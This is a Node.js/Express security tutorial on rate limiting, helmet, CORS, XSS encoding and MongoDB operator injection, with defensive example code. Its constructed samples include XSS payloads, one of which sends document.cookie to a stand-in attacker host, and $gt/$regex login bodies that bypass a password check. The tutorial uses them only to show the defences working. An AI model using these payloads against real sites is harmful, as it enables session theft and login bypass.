Security is one of the most important parts of any backend application.

When your app goes live, it becomes open to bots, attackers, spammers, and heavy traffic that can overload your server.

Two very important ways to protect your Node.js application are:

  1. Rate Limiting
  2. Security Middlewares (helmet, cors, sanitization, etc.)

Let's understand both in a simple and practical way.


Rate Limiting

Rate limiting means controlling how many requests a client can make to your server within a specific time window.

This blunts brute-force and credential-stuffing attacks, scraping, and runaway clients, and keeps one caller from starving the others. It is not a DDoS defence on its own: a distributed attack spreads its requests across many addresses, so a per-IP limit barely notices it, and volumetric floods have to be absorbed at the edge (CDN, load balancer, WAF) before they reach Node at all.

In Node.js, we can use the express-rate-limit middleware to implement rate limiting easily.


const express = require("express");
const rateLimit = require("express-rate-limit");

const app = express();

const limiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100, // limit each IP to 100 requests per window (v7 calls this option `limit`; `max` still works)
  standardHeaders: true, // send RateLimit-Limit / RateLimit-Remaining / RateLimit-Reset
  legacyHeaders: false, // drop the older X-RateLimit-* headers
  message: "Too many requests from this IP, please try again later."
});

app.use(limiter);

app.get("/", (req, res) => {
  res.send("API is working fine");
});

app.listen(3000);

Explanation

  1. We import the express-rate-limit package
  2. We create a limiter with a 15-minute window and a max of 100 requests per client IP
  3. We apply the limiter to all routes using app.use(limiter)
  4. If a client exceeds the limit, it receives HTTP 429 (Too Many Requests) with the custom message; when standard headers are enabled, the RateLimit-* headers also tell well-behaved clients how much quota is left and when it resets

Two things to check before relying on this. The "IP" is Express's req.ip, and Express only fills that from the X-Forwarded-For header when you configure app.set("trust proxy", ...); behind a load balancer without that setting every user shares the proxy's address and therefore one bucket, while enabling it when no trusted proxy exists lets a client choose its own address by sending the header. And the default store is in-process memory, so counts are per Node process: with a cluster or several instances, use a shared store (the package supports Redis and other backends), or each instance hands out the full quota.

Limiter for login attempts

You can also create stricter limiters for sensitive routes like login to slow down brute-force and credential-stuffing attacks. Keying on the IP alone has two weaknesses: users behind one NAT or corporate proxy share a single quota, and an attacker with many addresses gets many quotas. Pair it with a per-account counter or lockout on the server side.


const loginLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 5, // limit each IP to 5 login attempts per window
  skipSuccessfulRequests: true, // responses with status < 400 are not counted, so only failed logins burn quota
  message: "Too many login attempts from this IP, please try again later."
});

app.post("/login", loginLimiter, (req, res) => {
  // login logic here
});
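To make the mechanism behind windowMs/max concrete, here is an added example (not code from the original post or from express-rate-limit): a fixed-window, per-key limiter in plain Node.js with an Express-shaped middleware on top. It also shows the two things the library leaves to you: deriving the client key correctly behind a proxy, and keying the login limiter on address plus account. clientKey(), loginKey(), the fake req/res objects and simulateLogin() are illustration choices so it runs offline.

```javascript
// Added example (not from the original post, nor the express-rate-limit code):
// a fixed-window, per-key limiter in plain Node.js that exposes the mechanism
// behind windowMs/max. clientKey(), loginKey(), the fake req/res objects and
// simulateLogin() are illustration choices for running it offline.

function createRateLimiter({ windowMs, max, keyGenerator, clock = Date.now }) {
  const hits = new Map(); // key -> { count, windowStart }

  // Decide for one request; returns what the middleware needs for its headers.
  function check(key) {
    const now = clock();
    let entry = hits.get(key);
    if (!entry || now - entry.windowStart >= windowMs) {
      entry = { count: 0, windowStart: now }; // new window for this key
      hits.set(key, entry);
    }
    entry.count += 1;
    return {
      allowed: entry.count <= max,
      remaining: Math.max(0, max - entry.count),
      retryAfterSec: Math.ceil((entry.windowStart + windowMs - now) / 1000),
    };
  }

  // Express-style (req, res, next) middleware built on check().
  function middleware(req, res, next) {
    const result = check(keyGenerator(req));
    res.setHeader("RateLimit-Limit", String(max));
    res.setHeader("RateLimit-Remaining", String(result.remaining));
    if (!result.allowed) {
      res.setHeader("Retry-After", String(result.retryAfterSec));
      res.statusCode = 429; // Too Many Requests
      res.end("Too many requests, please try again later.");
      return;
    }
    next();
  }

  return { check, middleware };
}

// Behind a load balancer every connection comes from the proxy's address, so
// all users would share one bucket. X-Forwarded-For fixes that, but only trust
// it when a proxy you control sets it: a direct client can send the header too.
function clientKey(req, { trustProxy = false } = {}) {
  const xff = req.headers["x-forwarded-for"];
  if (trustProxy && xff) return xff.split(",")[0].trim(); // leftmost = original client
  return req.socket.remoteAddress;
}

// Login limiter keyed on address + account, so one address spraying many
// accounts and many addresses targeting one account are both slowed.
function loginKey(req) {
  const user = typeof req.body?.username === "string" ? req.body.username.toLowerCase() : "";
  return `${clientKey(req)}|${user}`;
}

// Constructed stand-ins for Express's req/res so the limiter runs without a server.
function fakeReq({ ip = "203.0.113.10", headers = {}, body = {} } = {}) {
  return { headers, body, socket: { remoteAddress: ip } };
}
function fakeRes() {
  const res = { statusCode: 200, headers: {}, body: null };
  res.setHeader = (k, v) => { res.headers[k.toLowerCase()] = v; };
  res.end = (b) => { res.body = b; };
  return res;
}

// Replay a list of {t, ip, user} attempts against a 5-per-15-minute login limiter
// with a controllable clock; returns the HTTP status each attempt received.
function simulateLogin(attempts, { windowMs = 15 * 60 * 1000, max = 5 } = {}) {
  let now = 0;
  const limiter = createRateLimiter({ windowMs, max, keyGenerator: loginKey, clock: () => now });
  return attempts.map((a) => {
    now = a.t;
    const res = fakeRes();
    let passed = false;
    limiter.middleware(fakeReq({ ip: a.ip, body: { username: a.user } }), res, () => { passed = true; });
    return passed ? 200 : res.statusCode;
  });
}
```

Six attempts on one account from one address within the window produce five 200s and a 429; a different account from the same address gets its own bucket, and the same account is admitted again once the window has elapsed. The clock is injected so the window boundary can be tested without waiting; the library's own store is the same idea with pluggable persistence.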

Helmet - Security Middleware

Helmet helps secure your Express apps by setting various HTTP response headers. It's a simple way to raise your app's baseline security.

Each header addresses a specific browser-side attack. With its defaults, helmet() sets, among others:

  1. Content-Security-Policy, which limits where scripts, styles and frames may load from and so reduces the impact of XSS (it does not stop the injection itself)
  2. X-Frame-Options, plus the CSP frame-ancestors directive, against clickjacking
  3. X-Content-Type-Options: nosniff against MIME sniffing
  4. Strict-Transport-Security, so browsers keep using HTTPS once they have seen the site over it

Headers cannot prevent injection attacks (SQL, NoSQL, command injection): those are fixed in the code that builds queries and commands, not in the response. Note also that the default CSP is strict (default-src 'self', no inline scripts), so pages with inline <script> tags will break until you configure the contentSecurityPolicy directives.

const helmet = require("helmet");
app.use(helmet());


CORS - Cross-Origin Resource Sharing

CORS lets you tell browsers which origins may read responses from your API. It is enforced by the browser, not by your server: the request still arrives and is still processed, and non-browser clients such as curl or a script ignore it entirely. So CORS protects your users' browsers from being used against your API by other sites; it does not authenticate callers, and state-changing endpoints still need their own authentication and CSRF protection.


const cors = require("cors");
app.use(cors({
     origin: "https://your-allowed-domain.com"
}));

Now browsers let pages on https://your-allowed-domain.com read responses from your API, and block reads from any other origin (the server still receives and handles the request). Keep origin as an explicit allowlist: never set origin: true, or echo the request's Origin header, when credentials: true is also enabled, since that lets any site make authenticated requests with the user's cookies and read the result.
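The following is an added example (not code from the original post or from the cors package): an allowlist-based CORS handler in plain Node.js next to the unsafe "reflect any Origin" pattern, so the browser-side decision can be traced. ALLOWED_ORIGINS, runCors() and the fake req/res objects are constructed for running it offline.

```javascript
// Added example (not from the original post, nor the cors package): an
// allowlist CORS handler in plain Node.js, alongside the unsafe "reflect any
// Origin" pattern, to show what the headers do and do not do. ALLOWED_ORIGINS,
// runCors() and the fake req/res are constructed for running offline.

const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// Headers for one request, given its Origin. Exact string match on
// scheme + host + port; no wildcards, no regex on the hostname.
function corsHeaders(origin, { allowCredentials = false } = {}) {
  const headers = { Vary: "Origin" }; // caches must not reuse one origin's answer for another
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return headers; // no ACAO: the browser blocks the read
  headers["Access-Control-Allow-Origin"] = origin;
  headers["Access-Control-Allow-Methods"] = "GET,POST,PUT,DELETE";
  headers["Access-Control-Allow-Headers"] = "Content-Type,Authorization";
  headers["Access-Control-Max-Age"] = "600";
  if (allowCredentials) {
    // Lets the browser send cookies/Authorization cross-origin. Only ever pair this
    // with an allowlisted origin, never with "*" or an echoed Origin.
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// Express-style middleware: answers the preflight itself, decorates other responses.
function cors(options = {}) {
  return function (req, res, next) {
    for (const [k, v] of Object.entries(corsHeaders(req.headers.origin, options))) res.setHeader(k, v);
    if (req.method === "OPTIONS") { // preflight: no body, no route handler
      res.statusCode = 204;
      res.end();
      return;
    }
    next(); // the handler runs regardless of origin; CORS only governs the browser's read
  };
}

// The pattern that turns CORS into a hole: echo whatever Origin arrived.
function insecureCorsHeaders(origin) {
  return { "Access-Control-Allow-Origin": origin || "*", "Access-Control-Allow-Credentials": "true" };
}

// Would a page on `origin` be allowed to read a credentialed response?
// (Browser rule: with credentials, "*" is rejected and ACAO must equal the origin.)
function browserCanReadWithCredentials(headers, origin) {
  return headers["Access-Control-Allow-Origin"] === origin &&
    headers["Access-Control-Allow-Credentials"] === "true";
}

// Run the middleware on a constructed request; report status, headers and whether
// the route handler was reached.
function runCors(method, origin, options) {
  const req = { method, headers: origin ? { origin } : {} };
  const res = { statusCode: 200, headers: {}, setHeader(k, v) { this.headers[k] = v; }, end() {} };
  let handlerRan = false;
  cors(options)(req, res, () => { handlerRan = true; });
  return { status: res.statusCode, headers: res.headers, handlerRan };
}
```

The point to notice in runCors() is that the route handler runs for the disallowed origin too; only the Access-Control-Allow-Origin header is withheld, and it is the browser that then refuses to hand the response to the page. The reflected variant grants that read to every origin, credentials included.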


Prevent XSS Attacks

To reduce XSS risk, you can use libraries like xss-clean to sanitize user input.


const xss = require("xss-clean");
app.use(xss()); // rewrites req.body, req.query and req.params in place

This middleware encodes characters such as < in incoming request data so that submitted HTML or JavaScript is stored in an inert form. Two caveats: xss-clean is no longer maintained, and sanitizing on input is only a second layer. The primary XSS defence is encoding on output, in the form that fits the context the value lands in (HTML body, attribute, URL, inline script); most template engines and front-end frameworks do this by default, and a value that is harmless in an HTML body can still be dangerous inside an href or an onclick. Input sanitization also mangles legitimate data, such as a comment containing "<3" or a pasted code snippet.
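Here is an added example (not code from the original post or from xss-clean) of the output-encoding approach: one encoder per context, applied while rendering, with a constructed hostile comment whose three fields each target a different context. escapeHtml(), safeHref(), jsStringLiteral(), renderComment() and HOSTILE_COMMENT are all constructed for this illustration.

```javascript
// Added example (not from the original post, nor xss-clean): context-aware
// output encoding, the primary XSS defence that input sanitising only backs up.
// escapeHtml(), safeHref(), jsStringLiteral(), renderComment() and the
// HOSTILE_COMMENT payloads are constructed for this illustration.

// HTML body and quoted-attribute context: neutralise the five break-out characters.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// URL attribute context (href/src): escaping is not enough, because
// javascript:alert(1) contains none of those characters. Allow only the
// schemes you expect and replace anything else with a harmless placeholder.
function safeHref(url) {
  let parsed;
  try { parsed = new URL(String(url)); } catch { return "#"; }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return "#";
  return escapeHtml(parsed.href); // still HTML-escape, since it lands in an attribute
}

// JavaScript string context (data embedded in an inline <script>): HTML escaping
// is the wrong encoder here; JSON-encode, then escape "<" so a value containing
// "</script>" cannot close the tag early.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, "\\u003c");
}

// Render a user-supplied comment, picking the encoder per context.
function renderComment({ author, website, text }) {
  return [
    `<div class="comment" data-author="${escapeHtml(author)}">`,
    `  <a href="${safeHref(website)}">${escapeHtml(author)}</a>`,
    `  <p>${escapeHtml(text)}</p>`,
    `  <script>showAuthor(${jsStringLiteral(author)});</script>`,
    `</div>`,
  ].join("\n");
}

// Constructed hostile input: each field targets a different context.
const HOSTILE_COMMENT = {
  author: '"><img src=x onerror=alert(1)>',
  website: "javascript:alert(document.cookie)",
  text: "</script><script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
};

// Count the <script> tags in the rendered page: exactly one, the template's own,
// means no injected script survived any of the three contexts.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}
```

Note what a single input-side pass would have missed: the javascript: URL contains nothing that HTML encoding touches, and the "</script>" inside the author name is harmless in the body but would terminate the inline script block if it were only HTML-escaped there.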


Prevent NoSQL Injection (MongoDB)

With body-parsing middleware, a JSON body such as {"username": "admin", "password": {"$gt": ""}} arrives as an object. If the handler passes req.body.password straight into a query, the $gt operator matches any stored value and the login succeeds without the password. To blunt this, you can use libraries like express-mongo-sanitize to strip query operators from user input.


const mongoSanitize = require("express-mongo-sanitize");
app.use(mongoSanitize()); // rewrites req.body, req.query, req.params and req.headers in place

This middleware removes any key that starts with $ or contains a . (so $gt, $or, $where, and dotted paths) from the request data, recursively; with the replaceWith option it substitutes a character instead of deleting the key. Treat it as a backstop rather than the fix: the real fix is to check that each field has the type the query expects (a string username, a string password) before it reaches the query, for example with a schema validator. Note also that on Express 5 req.query is a read-only getter, so the middleware cannot rewrite it in place; check the package's documentation for its current Express 5 support.
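To see the bypass and both defensive layers work, here is an added example (not code from the original post or from express-mongo-sanitize). fieldMatches() and findOne() are a deliberately tiny subset of MongoDB's query semantics written for this illustration, sanitize() reproduces the "$"/"." key rule described above, validateLogin() is the type check the text recommends, and USERS and the attack bodies are constructed.

```javascript
// Added example (not from the original post, nor express-mongo-sanitize): the
// operator-injection bypass against a login query and two layers that close it.
// fieldMatches()/findOne() are a deliberately tiny subset of MongoDB query
// semantics written for this illustration; USERS and the attack bodies are constructed.

// Equality, or a few operators when the condition is an object with "$" keys.
function fieldMatches(value, cond) {
  const isObj = cond !== null && typeof cond === "object" && !Array.isArray(cond);
  if (isObj && Object.keys(cond).some((k) => k.startsWith("$"))) {
    return Object.entries(cond).every(([op, arg]) => {
      switch (op) {
        case "$gt": return value > arg;
        case "$ne": return value !== arg;
        case "$regex": return new RegExp(arg).test(String(value));
        default: return false; // operator not modelled here
      }
    });
  }
  return JSON.stringify(value) === JSON.stringify(cond); // plain (deep) equality
}
function findOne(collection, query) {
  return collection.find((doc) =>
    Object.entries(query).every(([field, cond]) => fieldMatches(doc[field], cond))) || null;
}

// Constructed user table. A real system stores password hashes; plaintext here
// only keeps the example short.
const USERS = [{ username: "admin", password: "s3cr3t-Hunter2" }];

// Vulnerable: the parsed JSON body goes straight into the query object.
function loginVulnerable(body) {
  return findOne(USERS, { username: body.username, password: body.password }) !== null;
}

// Layer 1: drop keys starting with "$" or containing ".", recursively
// (the same rule express-mongo-sanitize applies to req.body/req.query/req.params).
function sanitize(value) {
  if (Array.isArray(value)) return value.map(sanitize);
  if (value !== null && typeof value === "object") {
    const out = {};
    for (const [k, v] of Object.entries(value)) {
      if (!k.startsWith("$") && !k.includes(".")) out[k] = sanitize(v);
    }
    return out;
  }
  return value;
}

// Layer 2 (the one to rely on): require exactly the types the handler expects,
// so an object can never reach the query where a string belongs.
function validateLogin(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") return null;
  if (body.username.length > 64 || body.password.length > 256) return null;
  return { username: body.username, password: body.password };
}

function loginHardened(body) {
  const creds = validateLogin(sanitize(body));
  return creds !== null && findOne(USERS, creds) !== null;
}

// Constructed attack bodies. JSON.parse turns {"$gt": ""} into an object, and every
// non-empty string sorts after "", so $gt matches whatever the real password is.
const GT_ATTACK = { username: "admin", password: { $gt: "" } };
// $regex additionally lets an attacker recover the secret one character at a time.
const REGEX_ATTACK = { username: "admin", password: { $regex: "^s3c" } };
```

Both attack bodies log in through loginVulnerable() and fail against loginHardened(). Note why the second layer matters even with the first in place: after sanitize() the password is an empty object, and it is the type check, not the key stripping, that keeps that object out of the query.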